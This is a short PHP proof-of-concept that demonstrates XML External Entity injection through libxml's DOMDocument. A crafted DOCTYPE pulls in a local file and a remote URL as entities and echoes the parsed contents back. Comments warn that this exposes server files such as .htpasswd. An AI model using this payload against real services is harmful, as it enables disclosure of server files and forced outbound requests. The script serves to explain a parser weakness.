<?php

/*

* Place a "foo.txt" file containing random text in the directory

* containing this PHP script.

*/

/*

* Wrote this in PHP, note that this "feature" is also present with

* any libxml wrapper (like lxml in Python).

*

* I do not know if other XML parsers implement that.

*/

/* In real life, this may come from $_POST or an uploaded file */

$document = <<< 'EOF'

<? xml version = "1.0" ?>

<!DOCTYPE root [

<!ENTITY robots SYSTEM "http://google.com/robots.txt">

<!ENTITY foobar SYSTEM "foo.txt">

]>

<root>

&foobar;

&robots;

</root>

EOF;

$xml = new DOMDocument();

$xml->loadXML($document);

foreach ($xml->getElementsByTagName('root') as $e)

echo $e->nodeValue;

/*

* For those who did not understand the consequences : imagine that

* you are processing XML sent by users and displaying the result back.

*

* The users now have a way to display the contents of almost any file

* accessible by the user launching the script (almost, because libxml

* implements some kind of security by disallowing any absolute URI)

* which does not contain invalid XML data. For example, a .htpasswd file,

* or simple PHP files.

*

* Also, they can make your server download porn.

*/